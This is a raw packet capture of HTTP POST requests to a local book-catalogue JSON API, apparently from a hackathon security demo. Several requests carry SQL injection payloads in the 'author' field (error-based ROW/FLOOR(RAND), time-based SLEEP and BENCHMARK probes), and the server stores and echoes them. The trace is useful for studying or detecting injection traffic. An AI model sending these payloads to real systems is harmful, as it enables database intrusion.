21:34:11.021527 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54616 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x5248), seq 820790405, win 43690, options [mss 65476,sackOK,TS val 7071285 ecr 0,nop,wscale 7], length 0
21:34:11.021566 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54616: Flags [S.], cksum 0x0030 (incorrect -> 0x10ce), seq 967319840, ack 820790406, win 43690, options [mss 65476,sackOK,TS val 7071285 ecr 7071285,nop,wscale 7], length 0
21:34:11.021592 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe2ff), seq 1, ack 1, win 342, options [nop,nop,TS val 7071285 ecr 7071285], length 0
21:34:11.021700 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.54616 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0x017e), seq 1:397, ack 1, win 342, options [nop,nop,TS val 7071285 ecr 7071285], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
21:34:11.021719 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54616: Flags [.], cksum 0x0028 (incorrect -> 0xe16b), seq 1, ack 397, win 350, options [nop,nop,TS val 7071285 ecr 7071285], length 0
21:34:11.026244 IP6 (hlim 64, next-header TCP (6) payload length: 433) ::1.8080 > ::1.54616: Flags [P.], cksum 0x01b9 (incorrect -> 0x5e54), seq 1:402, ack 397, win 350, options [nop,nop,TS val 7071290 ecr 7071285], length 401: HTTP, length: 401
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	10a
	{"id":65,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
21:34:11.026263 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdfd0), seq 397, ack 402, win 350, options [nop,nop,TS val 7071290 ecr 7071290], length 0
21:34:11.026517 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54616: Flags [P.], cksum 0x002d (incorrect -> 0x9ba9), seq 402:407, ack 397, win 350, options [nop,nop,TS val 7071290 ecr 7071290], length 5: HTTP
21:34:11.026532 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdfcb), seq 397, ack 407, win 350, options [nop,nop,TS val 7071290 ecr 7071290], length 0
21:34:11.028975 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54616 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xdfc7), seq 397, ack 407, win 350, options [nop,nop,TS val 7071293 ecr 7071290], length 0
21:34:11.029740 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54616: Flags [F.], cksum 0x0028 (incorrect -> 0xdfc3), seq 407, ack 398, win 350, options [nop,nop,TS val 7071293 ecr 7071293], length 0
21:34:11.029758 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54616 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdfc3), seq 398, ack 408, win 350, options [nop,nop,TS val 7071293 ecr 7071293], length 0
21:34:11.040570 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54618 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xbbf4), seq 374142307, win 43690, options [mss 65476,sackOK,TS val 7071304 ecr 0,nop,wscale 7], length 0
21:34:11.040598 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54618: Flags [S.], cksum 0x0030 (incorrect -> 0x8f78), seq 2458104627, ack 374142308, win 43690, options [mss 65476,sackOK,TS val 7071304 ecr 7071304,nop,wscale 7], length 0
21:34:11.040619 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x61aa), seq 1, ack 1, win 342, options [nop,nop,TS val 7071304 ecr 7071304], length 0
21:34:11.040717 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54618 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x6557), seq 1:197, ack 1, win 342, options [nop,nop,TS val 7071304 ecr 7071304], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.040731 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54618: Flags [.], cksum 0x0028 (incorrect -> 0x60de), seq 1, ack 197, win 350, options [nop,nop,TS val 7071304 ecr 7071304], length 0
21:34:11.043485 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54618: Flags [P.], cksum 0x00f1 (incorrect -> 0x8261), seq 1:202, ack 197, win 350, options [nop,nop,TS val 7071307 ecr 7071304], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	43
	{"id":66,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
21:34:11.043506 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x600f), seq 197, ack 202, win 350, options [nop,nop,TS val 7071307 ecr 7071307], length 0
21:34:11.043749 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54618: Flags [P.], cksum 0x002d (incorrect -> 0x1be8), seq 202:207, ack 197, win 350, options [nop,nop,TS val 7071307 ecr 7071307], length 5: HTTP
21:34:11.043767 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x600a), seq 197, ack 207, win 350, options [nop,nop,TS val 7071307 ecr 7071307], length 0
21:34:11.044032 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54618 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x6008), seq 197, ack 207, win 350, options [nop,nop,TS val 7071308 ecr 7071307], length 0
21:34:11.044210 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54618: Flags [F.], cksum 0x0028 (incorrect -> 0x6006), seq 207, ack 198, win 350, options [nop,nop,TS val 7071308 ecr 7071308], length 0
21:34:11.044233 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54618 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x6006), seq 198, ack 208, win 350, options [nop,nop,TS val 7071308 ecr 7071308], length 0
21:34:11.053148 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54620 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xa928), seq 3852744904, win 43690, options [mss 65476,sackOK,TS val 7071317 ecr 0,nop,wscale 7], length 0
21:34:11.053165 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54620: Flags [S.], cksum 0x0030 (incorrect -> 0x5fde), seq 2441531633, ack 3852744905, win 43690, options [mss 65476,sackOK,TS val 7071317 ecr 7071317,nop,wscale 7], length 0
21:34:11.053179 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3210), seq 1, ack 1, win 342, options [nop,nop,TS val 7071317 ecr 7071317], length 0
21:34:11.053245 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.54620 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0xd775), seq 1:208, ack 1, win 342, options [nop,nop,TS val 7071317 ecr 7071317], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
21:34:11.053255 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54620: Flags [.], cksum 0x0028 (incorrect -> 0x3139), seq 1, ack 208, win 350, options [nop,nop,TS val 7071317 ecr 7071317], length 0
21:34:11.055103 IP6 (hlim 64, next-header TCP (6) payload length: 244) ::1.8080 > ::1.54620: Flags [P.], cksum 0x00fc (incorrect -> 0x2a0f), seq 1:213, ack 208, win 350, options [nop,nop,TS val 7071319 ecr 7071317], length 212: HTTP, length: 212
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	4e
	{"id":67,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
21:34:11.055116 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x3061), seq 208, ack 213, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 0
21:34:11.055338 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54620: Flags [P.], cksum 0x002d (incorrect -> 0xec39), seq 213:218, ack 208, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 5: HTTP
21:34:11.055349 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x305c), seq 208, ack 218, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 0
21:34:11.055448 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54620 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x305b), seq 208, ack 218, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 0
21:34:11.055601 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54620: Flags [F.], cksum 0x0028 (incorrect -> 0x305a), seq 218, ack 209, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 0
21:34:11.055633 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54620 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x305a), seq 209, ack 219, win 350, options [nop,nop,TS val 7071319 ecr 7071319], length 0
21:34:11.063894 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54622 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x1dad), seq 1522355999, win 43690, options [mss 65476,sackOK,TS val 7071327 ecr 0,nop,wscale 7], length 0
21:34:11.063909 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54622: Flags [S.], cksum 0x0030 (incorrect -> 0x028a), seq 929168612, ack 1522356000, win 43690, options [mss 65476,sackOK,TS val 7071328 ecr 7071327,nop,wscale 7], length 0
21:34:11.063922 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd4ba), seq 1, ack 1, win 342, options [nop,nop,TS val 7071328 ecr 7071328], length 0
21:34:11.064007 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54622 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xd667), seq 1:197, ack 1, win 342, options [nop,nop,TS val 7071328 ecr 7071328], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.064017 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54622: Flags [.], cksum 0x0028 (incorrect -> 0xd3ee), seq 1, ack 197, win 350, options [nop,nop,TS val 7071328 ecr 7071328], length 0
21:34:11.065566 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54622: Flags [P.], cksum 0x00f1 (incorrect -> 0xf56f), seq 1:202, ack 197, win 350, options [nop,nop,TS val 7071329 ecr 7071328], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	43
	{"id":68,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
21:34:11.065582 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd323), seq 197, ack 202, win 350, options [nop,nop,TS val 7071329 ecr 7071329], length 0
21:34:11.065754 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54622: Flags [P.], cksum 0x002d (incorrect -> 0x8efc), seq 202:207, ack 197, win 350, options [nop,nop,TS val 7071329 ecr 7071329], length 5: HTTP
21:34:11.065769 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd31e), seq 197, ack 207, win 350, options [nop,nop,TS val 7071329 ecr 7071329], length 0
21:34:11.066084 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54622 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xd31c), seq 197, ack 207, win 350, options [nop,nop,TS val 7071330 ecr 7071329], length 0
21:34:11.075993 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54622: Flags [F.], cksum 0x0028 (incorrect -> 0xd310), seq 207, ack 198, win 350, options [nop,nop,TS val 7071340 ecr 7071330], length 0
21:34:11.076010 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54622 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd306), seq 198, ack 208, win 350, options [nop,nop,TS val 7071340 ecr 7071340], length 0
21:34:11.084298 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54624 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2774), seq 3743989973, win 43690, options [mss 65476,sackOK,TS val 7071348 ecr 0,nop,wscale 7], length 0
21:34:11.084316 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54624: Flags [S.], cksum 0x0030 (incorrect -> 0x1057), seq 2348917802, ack 3743989974, win 43690, options [mss 65476,sackOK,TS val 7071348 ecr 7071348,nop,wscale 7], length 0
21:34:11.084329 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe288), seq 1, ack 1, win 342, options [nop,nop,TS val 7071348 ecr 7071348], length 0
21:34:11.084423 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.54624 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x6ae4), seq 1:209, ack 1, win 342, options [nop,nop,TS val 7071348 ecr 7071348], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
21:34:11.084438 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54624: Flags [.], cksum 0x0028 (incorrect -> 0xe1b0), seq 1, ack 209, win 350, options [nop,nop,TS val 7071348 ecr 7071348], length 0
21:34:11.086665 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.54624: Flags [P.], cksum 0x00fd (incorrect -> 0xbe79), seq 1:214, ack 209, win 350, options [nop,nop,TS val 7071350 ecr 7071348], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	4f
	{"id":69,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
21:34:11.086683 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe0d7), seq 209, ack 214, win 350, options [nop,nop,TS val 7071350 ecr 7071350], length 0
21:34:11.086947 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54624: Flags [P.], cksum 0x002d (incorrect -> 0x9caf), seq 214:219, ack 209, win 350, options [nop,nop,TS val 7071351 ecr 7071350], length 5: HTTP
21:34:11.086963 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe0d0), seq 209, ack 219, win 350, options [nop,nop,TS val 7071351 ecr 7071351], length 0
21:34:11.087136 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54624 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe0cf), seq 209, ack 219, win 350, options [nop,nop,TS val 7071351 ecr 7071351], length 0
21:34:11.087763 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54624: Flags [F.], cksum 0x0028 (incorrect -> 0xe0ce), seq 219, ack 210, win 350, options [nop,nop,TS val 7071351 ecr 7071351], length 0
21:34:11.087780 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54624 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe0ce), seq 210, ack 220, win 350, options [nop,nop,TS val 7071351 ecr 7071351], length 0
21:34:11.097556 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54626 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x8fea), seq 2778829271, win 43690, options [mss 65476,sackOK,TS val 7071361 ecr 0,nop,wscale 7], length 0
21:34:11.097606 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54626: Flags [S.], cksum 0x0030 (incorrect -> 0xdc9f), seq 678994900, ack 2778829272, win 43690, options [mss 65476,sackOK,TS val 7071361 ecr 7071361,nop,wscale 7], length 0
21:34:11.097624 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xaed1), seq 1, ack 1, win 342, options [nop,nop,TS val 7071361 ecr 7071361], length 0
21:34:11.097733 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54626 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xae7e), seq 1:197, ack 1, win 342, options [nop,nop,TS val 7071361 ecr 7071361], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.097771 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54626: Flags [.], cksum 0x0028 (incorrect -> 0xae05), seq 1, ack 197, win 350, options [nop,nop,TS val 7071361 ecr 7071361], length 0
21:34:11.099814 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54626: Flags [P.], cksum 0x00f1 (incorrect -> 0xce8b), seq 1:202, ack 197, win 350, options [nop,nop,TS val 7071363 ecr 7071361], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	43
	{"id":70,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
21:34:11.099830 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xad38), seq 197, ack 202, win 350, options [nop,nop,TS val 7071363 ecr 7071363], length 0
21:34:11.100066 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54626: Flags [P.], cksum 0x002d (incorrect -> 0x6910), seq 202:207, ack 197, win 350, options [nop,nop,TS val 7071364 ecr 7071363], length 5: HTTP
21:34:11.100079 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xad31), seq 197, ack 207, win 350, options [nop,nop,TS val 7071364 ecr 7071364], length 0
21:34:11.100230 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54626 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xad30), seq 197, ack 207, win 350, options [nop,nop,TS val 7071364 ecr 7071364], length 0
21:34:11.100356 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54626: Flags [F.], cksum 0x0028 (incorrect -> 0xad2f), seq 207, ack 198, win 350, options [nop,nop,TS val 7071364 ecr 7071364], length 0
21:34:11.100373 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54626 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xad2f), seq 198, ack 208, win 350, options [nop,nop,TS val 7071364 ecr 7071364], length 0
21:34:11.116483 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54628 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xc6ba), seq 1154005963, win 43690, options [mss 65476,sackOK,TS val 7071380 ecr 0,nop,wscale 7], length 0
21:34:11.116504 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54628: Flags [S.], cksum 0x0030 (incorrect -> 0xe034), seq 388032596, ack 1154005964, win 43690, options [mss 65476,sackOK,TS val 7071380 ecr 7071380,nop,wscale 7], length 0
21:34:11.116520 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb266), seq 1, ack 1, win 342, options [nop,nop,TS val 7071380 ecr 7071380], length 0
21:34:11.116634 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.54628 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0xa981), seq 1:286, ack 1, win 342, options [nop,nop,TS val 7071380 ecr 7071380], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
21:34:11.116646 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54628: Flags [.], cksum 0x0028 (incorrect -> 0xb141), seq 1, ack 286, win 350, options [nop,nop,TS val 7071380 ecr 7071380], length 0
21:34:11.118875 IP6 (hlim 64, next-header TCP (6) payload length: 321) ::1.8080 > ::1.54628: Flags [P.], cksum 0x0149 (incorrect -> 0x2fd1), seq 1:290, ack 286, win 350, options [nop,nop,TS val 7071383 ecr 7071380], length 289: HTTP, length: 289
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	9b
	{"id":71,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
21:34:11.118889 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb01a), seq 286, ack 290, win 350, options [nop,nop,TS val 7071383 ecr 7071383], length 0
21:34:11.119106 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54628: Flags [P.], cksum 0x002d (incorrect -> 0x6bf3), seq 290:295, ack 286, win 350, options [nop,nop,TS val 7071383 ecr 7071383], length 5: HTTP
21:34:11.119119 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb015), seq 286, ack 295, win 350, options [nop,nop,TS val 7071383 ecr 7071383], length 0
21:34:11.119294 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54628 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xb014), seq 286, ack 295, win 350, options [nop,nop,TS val 7071383 ecr 7071383], length 0
21:34:11.119977 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54628: Flags [F.], cksum 0x0028 (incorrect -> 0xb012), seq 295, ack 287, win 350, options [nop,nop,TS val 7071384 ecr 7071383], length 0
21:34:11.119992 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb011), seq 287, ack 296, win 350, options [nop,nop,TS val 7071384 ecr 7071384], length 0
21:34:11.128432 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54630 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x3b00), seq 1696868124, win 43690, options [mss 65476,sackOK,TS val 7071392 ecr 0,nop,wscale 7], length 0
21:34:11.128459 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54630: Flags [S.], cksum 0x0030 (incorrect -> 0x73a0), seq 1300206275, ack 1696868125, win 43690, options [mss 65476,sackOK,TS val 7071392 ecr 7071392,nop,wscale 7], length 0
21:34:11.128483 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x45d2), seq 1, ack 1, win 342, options [nop,nop,TS val 7071392 ecr 7071392], length 0
21:34:11.128562 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54630 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x437f), seq 1:197, ack 1, win 342, options [nop,nop,TS val 7071392 ecr 7071392], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
21:34:11.128577 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54630: Flags [.], cksum 0x0028 (incorrect -> 0x4506), seq 1, ack 197, win 350, options [nop,nop,TS val 7071392 ecr 7071392], length 0
21:34:11.131256 IP6 (hlim 64, next-header TCP (6) payload length: 233) ::1.8080 > ::1.54630: Flags [P.], cksum 0x00f1 (incorrect -> 0x6587), seq 1:202, ack 197, win 350, options [nop,nop,TS val 7071395 ecr 7071392], length 201: HTTP, length: 201
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:34:11 GMT
	
	43
	{"id":72,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
21:34:11.131273 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4437), seq 197, ack 202, win 350, options [nop,nop,TS val 7071395 ecr 7071395], length 0
21:34:11.131512 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54630: Flags [P.], cksum 0x002d (incorrect -> 0x0010), seq 202:207, ack 197, win 350, options [nop,nop,TS val 7071395 ecr 7071395], length 5: HTTP
21:34:11.131530 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4432), seq 197, ack 207, win 350, options [nop,nop,TS val 7071395 ecr 7071395], length 0
21:34:11.131633 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54630 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4431), seq 197, ack 207, win 350, options [nop,nop,TS val 7071395 ecr 7071395], length 0
21:34:11.132513 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54630: Flags [F.], cksum 0x0028 (incorrect -> 0x442f), seq 207, ack 198, win 350, options [nop,nop,TS val 7071396 ecr 7071395], length 0
21:34:11.132528 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x442e), seq 198, ack 208, win 350, options [nop,nop,TS val 7071396 ecr 7071396], length 0
21:34:11.140426 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54632 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xd058), seq 4036560448, win 43690, options [mss 65476,sackOK,TS val 7071404 ecr 0,nop,wscale 7], length 0
21:34:11.140449 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54632: Flags [S.], cksum 0x0030 (incorrect -> 0xad23), seq 2570232537, ack 4036560449, win 43690, options [mss 65476,sackOK,TS val 7071404 ecr 7071404,nop,wscale 7], length 0
21:34:11.140471 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7f55), seq 1, ack 1, win 342, options [nop,nop,TS val 7071404 ecr 7071404], length 0
